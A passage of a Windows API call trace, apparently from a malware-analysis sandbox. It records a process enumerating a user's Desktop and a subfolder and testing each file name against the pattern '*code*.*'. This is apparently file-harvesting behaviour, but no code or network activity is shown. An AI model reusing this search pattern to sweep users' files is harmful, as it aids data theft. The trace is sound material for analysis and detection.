lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d80 [0110.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d80, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.945] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*code*.*") returned 0 [0110.945] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39c99910, ftCreationTime.dwHighDateTime=0x1d7af1b, ftLastAccessTime.dwLowDateTime=0x44bbdf10, ftLastAccessTime.dwHighDateTime=0x1d7af4b, ftLastWriteTime.dwLowDateTime=0x44bbdf10, ftLastWriteTime.dwHighDateTime=0x1d7af4b, nFileSizeHigh=0x0, nFileSizeLow=0x6aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="MB3JQQUgbwGVRNgeCA.gif", cAlternateFileName="MB3JQQ~1.GIF")) returned 1 [0110.945] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.945] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x38ea658 [0110.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x38ea658, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", lpUsedDefaultChar=0x0) returned 54 [0110.945] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0110.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.945] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ca0 [0110.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970ca0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.945] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.945] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*code*.*") returned 0 [0110.945] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c41370, ftCreationTime.dwHighDateTime=0x1d7ae73, ftLastAccessTime.dwLowDateTime=0x50a541d0, ftLastAccessTime.dwHighDateTime=0x1d7af24, ftLastWriteTime.dwLowDateTime=0x50a541d0, ftLastWriteTime.dwHighDateTime=0x1d7af24, nFileSizeHigh=0x0, nFileSizeLow=0x17a6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="O93_HCF.xlsx", cAlternateFileName="O93_HC~1.XLS")) returned 1 [0110.945] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.945] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", lpUsedDefaultChar=0x0) returned 44 [0110.945] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.945] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970da0 [0110.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970da0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.945] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.945] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*code*.*") returned 0 [0110.945] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212b71d0, ftCreationTime.dwHighDateTime=0x1d7a377, ftLastAccessTime.dwLowDateTime=0xbbf74c40, ftLastAccessTime.dwHighDateTime=0x1d7ac26, ftLastWriteTime.dwLowDateTime=0xbbf74c40, ftLastWriteTime.dwHighDateTime=0x1d7ac26, nFileSizeHigh=0x0, nFileSizeLow=0x4735, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oar504.gif", cAlternateFileName="")) returned 1 [0110.946] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.946] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", lpUsedDefaultChar=0x0) returned 42 [0110.946] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.946] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970da0 [0110.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970da0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.946] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.946] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*code*.*") returned 0 [0110.946] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p B1LdDcHaeS", cAlternateFileName="PB1LDD~1")) returned 1 [0110.946] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.946] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0110.946] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.946] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.946] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.946] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5cc6e0, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x5ed18130, ftLastAccessTime.dwHighDateTime=0x1d7a4a0, ftLastWriteTime.dwLowDateTime=0x5ed18130, ftLastWriteTime.dwHighDateTime=0x1d7a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x34c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eLLiqLz9t.avi", cAlternateFileName="6ELLIQ~1.AVI")) returned 1 [0110.946] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.946] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2930 [0110.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x29a2930, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", lpUsedDefaultChar=0x0) returned 59 [0110.946] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0110.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970c80 [0110.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970c80, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.947] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*code*.*") returned 0 [0110.947] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe18e7860, ftCreationTime.dwHighDateTime=0x1d7a074, ftLastAccessTime.dwLowDateTime=0x48a8aa90, ftLastAccessTime.dwHighDateTime=0x1d7ab22, ftLastWriteTime.dwLowDateTime=0x48a8aa90, ftLastWriteTime.dwHighDateTime=0x1d7ab22, nFileSizeHigh=0x0, nFileSizeLow=0xdfb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9uCaq_HSLxl.pdf", cAlternateFileName="D9UCAQ~1.PDF")) returned 1 [0110.947] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2c48 [0110.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x29a2c48, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", lpUsedDefaultChar=0x0) returned 61 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2930 [0110.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ec0 [0110.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970ec0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.947] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*code*.*") returned 0 [0110.947] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8974c4f0, ftCreationTime.dwHighDateTime=0x1d7af73, ftLastAccessTime.dwLowDateTime=0x4d8c28d0, ftLastAccessTime.dwHighDateTime=0x1d7b012, ftLastWriteTime.dwLowDateTime=0x4d8c28d0, ftLastWriteTime.dwHighDateTime=0x1d7b012, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="E144W5Mz.swf", cAlternateFileName="")) returned 1 [0110.947] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2c00 [0110.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x29a2c00, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", lpUsedDefaultChar=0x0) returned 57 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2978 [0110.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ee0 [0110.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970ee0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.947] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.948] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*code*.*") returned 0 [0110.948] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd254fcd0, ftCreationTime.dwHighDateTime=0x1d7a618, ftLastAccessTime.dwLowDateTime=0x8a464820, ftLastAccessTime.dwHighDateTime=0x1d7aac5, ftLastWriteTime.dwLowDateTime=0x8a464820, ftLastWriteTime.dwHighDateTime=0x1d7aac5, nFileSizeHigh=0x0, nFileSizeLow=0xbc6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDOubGqNdXLFW1EA.wav", cAlternateFileName="LDOUBG~1.WAV")) returned 1 [0110.948] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0110.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x39700d0 [0110.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x39700d0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", lpUsedDefaultChar=0x0) returned 65 [0110.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eafd0 [0110.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ca0 [0110.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970ca0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.948] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*code*.*") returned 0 [0110.948] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4da7350, ftCreationTime.dwHighDateTime=0x1d79ff8, ftLastAccessTime.dwLowDateTime=0x83641e80, ftLastAccessTime.dwHighDateTime=0x1d7ac8a, ftLastWriteTime.dwLowDateTime=0x83641e80, ftLastWriteTime.dwHighDateTime=0x1d7ac8a, nFileSizeHigh=0x0, nFileSizeLow=0x10bdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFSiahfxrlNjf.swf", cAlternateFileName="OFSIAH~1.SWF")) returned 1 [0110.948] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2cd8 [0110.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", cchWideChar=62, lpMultiByteStr=0x29a2cd8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\OFSiahfxrlNjf.swf", lpUsedDefaultChar=0x0) returned 62 [0110.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0110.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970b60 [0110.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970b60, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.948] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*code*.*") returned 0 [0110.948] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198c70, ftCreationTime.dwHighDateTime=0x1d7a68b, ftLastAccessTime.dwLowDateTime=0xa83a5210, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0xa83a5210, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x10237, dwReserved0=0x0, dwReserved1=0x0, cFileName="ws8IgIZUQH.mkv", cAlternateFileName="WS8IGI~1.MKV")) returned 1 [0110.948] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2a08 [0110.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", cchWideChar=59, lpMultiByteStr=0x29a2a08, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\ws8IgIZUQH.mkv", lpUsedDefaultChar=0x0) returned 59 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0110.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ca0 [0110.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970ca0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.949] PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*code*.*") returned 0 [0110.949] FindNextFileW (in: 